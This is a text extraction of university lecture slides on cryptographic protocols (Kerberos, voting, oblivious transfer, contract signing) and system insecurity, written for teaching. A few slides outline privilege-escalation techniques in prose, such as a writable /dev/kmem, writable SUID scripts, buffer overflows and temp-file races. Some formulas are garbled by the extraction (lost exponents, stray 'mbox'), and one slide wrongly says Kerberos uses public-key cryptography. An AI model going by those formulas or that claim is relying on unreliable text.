![Page 376: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/376.jpg)
Chapter 8
Lecture 8 - Protocols
CS3235 - Hugh Anderson’s notes. Page number: 375
![Page 377: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/377.jpg)
Mid semester Test
9th October 2003
LT27, 14:30
MCQ, closed book
Covers everything up to and including today...
CS3235 - Hugh Anderson’s notes. Page number: 376
![Page 378: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/378.jpg)
Last session
• Finish on error correction
• Encryption
– Symmetric keys∗ DES
– Public keys∗ RSA
CS3235 - Hugh Anderson’s notes. Page number: 377
![Page 379: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/379.jpg)
This session
• Kerberos
• Voting
• Contract signing
CS3235 - Hugh Anderson’s notes. Page number: 378
![Page 380: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/380.jpg)
Summary
Substitution, Vigenère, index of coincidence
DES, Feistel, modes of operation
Public key, Diffie Hellman, RSA
CS3235 - Hugh Anderson’s notes. Page number: 379
![Page 381: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/381.jpg)
Vigenère
If our keyword was BAD, then encoding HAD A FEED wouldresult in
Key B A D B A D B A
Text H A D A F E E D
Cipher I A G B F H F D
If we can discover the length of the repeated key (in thiscase 3), and the text is long enough, we can just considerthe cipher text to be a group of interleaved monoalphabeticsubstitution ciphers and solve accordingly.
CS3235 - Hugh Anderson’s notes. Page number: 380
![Page 382: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/382.jpg)
Analysis
The index of coincidence is the probability that two randomlychosen letters from the cipher will be the same, and it canhelp us discover the length of a key
IC =1
N(N − 1)
25∑
i=0
Fi(Fi − 1)
where Fi is the frequency of the occurences of symbol i andN is the length of the cipher.
CS3235 - Hugh Anderson’s notes. Page number: 381
![Page 383: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/383.jpg)
DES - Feistel
+ f
+ f
+ f
+ f
+ f
+ f
K2
K1
K0
K1
K0
K2
l0 r0
l0 r0
l1 r1
l2 r2
l3 r3
l3 r3
l2 r2
l1 r1
Each of the 16 stages (rounds) of DES uses a Feistel struc-ture which encrypts a 64 bit value into another 64 bit valueusing a 48 bit key derived from the original 56 bit key.
CS3235 - Hugh Anderson’s notes. Page number: 382
![Page 384: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/384.jpg)
DES modes of operation
DES
Ctext
msg
Electronic Code Book
DES
Ctext
msg
DES
Ctext
msg
Cipher Block Chaining
Initial vector
CS3235 - Hugh Anderson’s notes. Page number: 383
![Page 385: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/385.jpg)
Public key systems
Public key cryptography relies on the use of encipheringfunctions which are not realistically invertible unless youhave a deciphering key.
(Plaintext)XX
P
K1 (K1[K2[P]]=P)and also(K2[K1[P]]=P)
K1[P]
K2
P
CS3235 - Hugh Anderson’s notes. Page number: 384
![Page 386: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/386.jpg)
Authentication
K2
XP
K1
PK1[J2[P]]
J1J2
XXX
CS3235 - Hugh Anderson’s notes. Page number: 385
![Page 387: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/387.jpg)
Diffie-Hellman key agreement
Two separated users create and share a secret key. A thirdparty is not realistically able to calculate the shared key.
g mod p
p,g
ba
p,g,a
b
Ted
BobAlicep,g,b
ag mod p
g mod pg mod p
bg mod pag mod p
CS3235 - Hugh Anderson’s notes. Page number: 386
![Page 388: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/388.jpg)
RSA coding algorithms
The four processes needed for RSA encryption:
1. Creating a public key
2. Creating a secret key
3. Encrypting messages
4. Decoding messages
CS3235 - Hugh Anderson’s notes. Page number: 387
![Page 389: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/389.jpg)
Uses of encryption
1. Generating encrypted passwords with 1-way functions
2. Checking integrity by appending digital signature
3. Checking the authenticity of a message.
4. Encrypting timestamps with messages to prevent replayattacks.
5. Exchanging a key.
CS3235 - Hugh Anderson’s notes. Page number: 388
![Page 390: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/390.jpg)
Protocols
Systems in which the protocol plays a large part:
1. Kerberos protocol for distributing keys
2. Voting protocols
3. Contract signing protocols
These three protocols are by no means the only ones.
CS3235 - Hugh Anderson’s notes. Page number: 389
![Page 391: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/391.jpg)
Other examples
Key distribution
Clipper
Oblivious transfer, in which two parties can complete ajoint computation, without either party revealing any un-necessary data.
CS3235 - Hugh Anderson’s notes. Page number: 390
![Page 392: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/392.jpg)
Kerberos/Cerberus
CS3235 - Hugh Anderson’s notes. Page number: 391
![Page 393: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/393.jpg)
Kerberos
Network authentication protocol.
Strong authentication for client/server applications usingpublic key cryptography.
Kerberos is freely available in source form
Kerberos is also available in commercial products.
Client can prove its identity to a server (and vice versa)across an insecure network connection.
CS3235 - Hugh Anderson’s notes. Page number: 392
![Page 394: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/394.jpg)
Kerberos
After a client and server have used Kerberos to provetheir identity, they can also encrypt all of their commu-nications to assure privacy and data integrity as they goabout their business.
Must have a Key Distribution Center (KDC)
Kerberos uses Needham-Schroeder protocol.
CS3235 - Hugh Anderson’s notes. Page number: 393
![Page 395: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/395.jpg)
Kerberos
Client
Server
(6)
(5)
KDC
(4)(3)(2)
Ticket grantingAuthentication
(1)
CS3235 - Hugh Anderson’s notes. Page number: 394
![Page 396: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/396.jpg)
Kerberos
When a client first authenticates to Kerberos, she:
1. Talks to KDC, to get a Ticket Granting Ticket
2. Uses that to talk to the Ticket Granting Service
3. Uses the ticket, to interact with the server.
This way a user doesn’t have to reenter passwords everytime they wish to connect to a Kerberized service. If theTicket Granting Ticket is compromised, an attacker can onlymasquerade as a user until the ticket expires.
CS3235 - Hugh Anderson’s notes. Page number: 395
![Page 397: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/397.jpg)
Kerberos protocol
Two sorts of credentials: tickets and authenticators .
A ticket Tc,s contains the client’s name and network ad-dress, the server’s name, a timestamp and a session key.This is encrypted with the server’s secret key (so that theclient is unable to modify it).
An authenticator Ac,s contains the client’s name, a times-tamp and an optional extra session key. This is encryptedwith the session key shared between the client and theserver.
CS3235 - Hugh Anderson’s notes. Page number: 396
![Page 398: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/398.jpg)
Kerberos protocol
A key Kx,y is a session key shared by both x and y.
When we encrypt a message M using the key Kx,y wewrite it as MKx,y.
CS3235 - Hugh Anderson’s notes. Page number: 397
![Page 399: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/399.jpg)
Kerberos protocol
Alice wants session key for communication with Bob:
• Alice sends message to Ted containing her identity, Ted’sTGS identity, and one-time value (n) : a, tgs, n.
• Ted responds with a key encrypted with Alice’s secret key(which Ted knows), and a ticket encrypted with the TGSsecret key: Ka,tgs, nKa Ta,tgsKtgs.Alice now has ticket and session key: Ta,tgsKtgs, Ka,tgs
• Alice can prove her identity to the TGS, as she has ses-sion key Ka,tgs, and Ticket Granting Ticket : Ta,tgsKtgs.
CS3235 - Hugh Anderson’s notes. Page number: 398
![Page 400: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/400.jpg)
Kerberos protocol
Later, Alice can ask the TGS for a specific service ticket:
• When Alice wants a ticket for a specific ser-vice (say with Bob), she sends an authenticatoralong with the Ticket Granting Ticket to the TGS:Aa,bKa,tgs Ta,tgsKtgs , b, n.
• The TGS responds with a suitable key and a ticket:Ka,b, nKa,tgs Ta,bKb.
• Alice can now use an authenticator and ticket directly withBob: Aa,bKa,b Ta,bKb.
CS3235 - Hugh Anderson’s notes. Page number: 399
![Page 401: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/401.jpg)
Weaknesses
Host security: Kerberos makes no provisions for host se-curity; it assumes that it is running on trusted hosts withan untrusted network.
KDC compromises: Kerberos uses a principal’s password(encryption key) as the fundamental proof of identity.
Salt: This is an additional input to the one-way hash algo-rithm.
CS3235 - Hugh Anderson’s notes. Page number: 400
![Page 402: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/402.jpg)
Voting protocols
A voting protocol is one in which
• independent systems vote in a kind of election, and
• afterwards we can check that the vote was correct.
• Each voter is only allowed a single vote, and
• the system should be corruption-proof.
CS3235 - Hugh Anderson’s notes. Page number: 401
![Page 403: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/403.jpg)
Voting protocols
Example with Alice, Bob and Charles (!), who vote and thenencrypt and sign a series of messages using public-key en-cryption. For example, if Alice votes vA, then she will broad-cast to all other voters the message
RA(RB(RC(EA(EB(EC(vA))))))
where RA is a random encoding function which adds a ran-dom string to a message before encrypting it with A’s publickey, and EA is public key encryption with A’s public key.
CS3235 - Hugh Anderson’s notes. Page number: 402
![Page 404: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/404.jpg)
Voting protocols
Each voter then signs the message and decrypts onelevel of the encryption.
At the end of the protocol, each voter has a completesigned audit trail and is ensured of the validity of the vote.
CS3235 - Hugh Anderson’s notes. Page number: 403
![Page 405: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/405.jpg)
Tossing a coin
Alice and Bob want to toss a coin
Alice calculates two primes p, q and calculates N = pq,sends N to Bob. N = 35 = 5 ∗ 7
If Bob can factorize the number, then Bob wins a cointoss.
Bob selects random x, and sends x2 mod N = y to Alice.y = 312 mod 35 = 16
CS3235 - Hugh Anderson’s notes. Page number: 404
![Page 406: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/406.jpg)
Tossing a coin
Alice calculates the four square roots of 16:
• 42 mbox 35 = 16
• 312 mbox 35 = 16
• 242 mbox 35 = 16
• 112 mbox 35 = 16
This is easy for Alice, as she knows the prime factors of N .She then sends one of these back to Bob.
CS3235 - Hugh Anderson’s notes. Page number: 405
![Page 407: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/407.jpg)
Tossing a coin
If Bob receives x or −x, then he learns nothing, but
if Bob receives either of the other values, he can add thisto x, and then find the GCD of the result with N:
GCD(24 + 31, 35) = GCD(55, 35)
= 5
Alice is unable to tell she has divulged the factor
CS3235 - Hugh Anderson’s notes. Page number: 406
![Page 408: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/408.jpg)
Oblivious transfer
In an oblivious transfer, randomness is used to convinceparticipants of the fairness of some transaction
In a coin-tossing example, Alice knows the prime factorsof a large number, and if Bob can factorize the number,then Bob wins a coin toss.
A protocol allows Alice to either divulge one of the primefactors to Bob, or not, with equal probability.
Alice is unable to tell if she has divulged the factor, andso the coin toss is fair.
CS3235 - Hugh Anderson’s notes. Page number: 407
![Page 409: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/409.jpg)
Contract signing
Signing contracts can be difficult.
If one party signs the contract, the other may not. Wehave one party bound by the contract, and the other not.
In addition, both may sign, and then one may say “I didn’tsign any contract!” afterwards.
CS3235 - Hugh Anderson’s notes. Page number: 408
![Page 410: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/410.jpg)
Contract signing
Oblivious transfer used for contract-signing where
• Up to a certain point neither party is bound
• After that point both parties are bound
• Either party can prove that the other party signed
Alice and Bob exchange signed messages, agreeing to bebound by a contract with ever-increasing probability
CS3235 - Hugh Anderson’s notes. Page number: 409
![Page 411: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/411.jpg)
Contract signing
In the event of early termination of the contract, eitherparty can take the messages they have to an adjudica-tor, who chooses a random probability value (42% say)before looking at the messages.
If both messages are over 42% then both parties arebound.
If less then both parties are free.
CS3235 - Hugh Anderson’s notes. Page number: 410
![Page 412: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/412.jpg)
Chapter 9
Lecture 9 - System(in)security
CS3235 - Hugh Anderson’s notes. Page number: 411
![Page 413: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/413.jpg)
Admininstration
Results are out - please check.
Assignment 1
hardcopy to tutor or me, email softcopy to me.
Assignment 2 ... better get going.
CS3235 - Hugh Anderson’s notes. Page number: 412
![Page 414: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/414.jpg)
Last session
• Kerberos
• Voting
• Contract signing
CS3235 - Hugh Anderson’s notes. Page number: 413
![Page 415: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/415.jpg)
This session
• Ethics and computing
• Organizations and standards
• UNIX passwords
• NT passwords
CS3235 - Hugh Anderson’s notes. Page number: 414
![Page 416: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/416.jpg)
Stranger danger...
One of my sons was taught stranger-danger at hisschool. We were asked to quiz him afterwards, sowe asked him if he should accept a lift in a car witha stranger. He immediately replied “No way! ”. Wethen asked: “What if he offered you sweets? ”, buthe still replied “No way! ”. Finally we asked: “Whynot? ”, to which he replied “Because you might notget any !”
CS3235 - Hugh Anderson’s notes. Page number: 415
![Page 417: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/417.jpg)
Ethics
Moral development stages:
Stage 1: Obedience and punishment
...
Stage 6: Individual principles of conscience - an orienta-tion not only toward existing social rules, but also towardthe conscience as a directing agent, mutual trust and re-spect, and principles of moral choice involving logical uni-versalities and consistency. If one acts otherwise, self-condemnation and guilt result.
CS3235 - Hugh Anderson’s notes. Page number: 416
![Page 418: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/418.jpg)
Ethics
It is my expectation, and requirement, that you are ableto maturely evaluate rights and wrongs.
In these sections of the course, I will be outlining systemswhich demonstrate poor cryptographic techniques, andas a result, can be defeated.
A more cynical view might be that I am teaching hacking
...this is not my intent...
CS3235 - Hugh Anderson’s notes. Page number: 417
![Page 419: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/419.jpg)
Ethics and computing
No new ethical dilemmas... Perhaps the only significant dif-ference is that the computer crimes are so easy.
Software duplication: = theft.
Using information: = insider trading.
E-mail abuse: = abuse.
CS3235 - Hugh Anderson’s notes. Page number: 418
![Page 420: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/420.jpg)
Network administrator’s dilemma
Network administrators often come to learn things abouttheir ’clients’
Without asking the client, they should not make use ofthat information.
The network administrator’s dilemma: How to controlbad-guys without trampling over rights.
CS3235 - Hugh Anderson’s notes. Page number: 419
![Page 421: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/421.jpg)
Professional codes of ethics
Most professional bodies13 have formal written codes ofethics
The computer industry has yet to develop a standardcode of conduct
If computer crime continues to rise, codes may be im-posed on it.
13For example: Medical boards.
CS3235 - Hugh Anderson’s notes. Page number: 420
![Page 422: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/422.jpg)
ACS code of ethics
1. I will serve the interests of my clients and employers, my employeesand students, and the community generally, as matters of no lesspriority than the interests of myself or my colleagues....
Within a general framework of ethical and moral responsi-bility, codes such as this one can help clarify grey areas ofconcern.
CS3235 - Hugh Anderson’s notes. Page number: 421
![Page 423: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/423.jpg)
Insecurity - threats are real
For example:
• Pentagon machines were repeatedly corrupted by un-known intruders during the Gulf war. The intruders ap-peared to be doing it as part of a contest.
• German hackers demonstrated on TV a method of trans-ferring money into their own accounts using ActiveX con-trols downloaded to an unsuspecting person’s machine.
• Estimates of computer theft in the US range from 1 to 30$billion/year - most of which goes unreported.
CS3235 - Hugh Anderson’s notes. Page number: 422
![Page 424: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/424.jpg)
Taxonomy of insecurity?
Each new attack adds new levels to the structure:
• physical insecurity, and
• password insecurity
Some of the security of modern systems is provided throughcryptographic techniques (particularly password storage),the subject today.
CS3235 - Hugh Anderson’s notes. Page number: 423
![Page 425: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/425.jpg)
Non-cryptographic cracking
Misconfiguration: If excessive permissions exist on cer-tain directories and files, these can lead to gaining higherlevels of access. For example, on a UNIX system, if/dev/kmem is writable it is possible to rewrite your UIDto match root’s.
Poor SUID: Sometimes there are scripts (shell or Perl) thatperform certain tasks and run as root. If the scripts arewritable by you, you can edit it and run it.
CS3235 - Hugh Anderson’s notes. Page number: 424
![Page 426: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/426.jpg)
Non-cryptographic cracking
Buffer overflow: Buffer overflows are typically used tospawn root shells from a (server) process running asroot.
Race conditions: A race condition is when a program cre-ates a short opportunity for attack by opening a smallwindow of vulnerability. For example, a program that al-ters a sensitive file might use a temporary backup copyof the file during its alteration.
CS3235 - Hugh Anderson’s notes. Page number: 425
![Page 427: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/427.jpg)
Non-cryptographic cracking
Poor temporary files: Many programs create temporaryfiles while they run. If a program runs as root and is notcareful about where it puts its temporary files and whatpermissions these files have, it might be possible to uselinks to create root-owned files.
Attacks using these methods can be launched locally onthe target machine, or often remotely, by exploiting serviceswith loopholes.
CS3235 - Hugh Anderson’s notes. Page number: 426
![Page 428: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/428.jpg)
Protection
Can you protect yourself against attacks?
• Hack/crack yourself:
• Be vigilant:
• Reduce reliance:
• Use more secure systems:
• Update systems:
Finally: “Its not the end of the world!”
CS3235 - Hugh Anderson’s notes. Page number: 427
![Page 429: Introduction to Computer Security CS3235cs3235/2003-semesterI/foils.pdf1928: Maths Dept at University of Poznan: Marian Re-jewski, Jerzy Rozycki, Henryk Zygalski. Decoded some messages](https://reader033.fdocuments.in/reader033/viewer/2022053020/5f294e69dc3f0f712c43cfab/html5/thumbnails/429.jpg)
This session
• Ethics and computing
• Organizations and standards
• UNIX passwords
• NT passwords
CS3235 - Hugh Anderson’s notes. Page number: 428
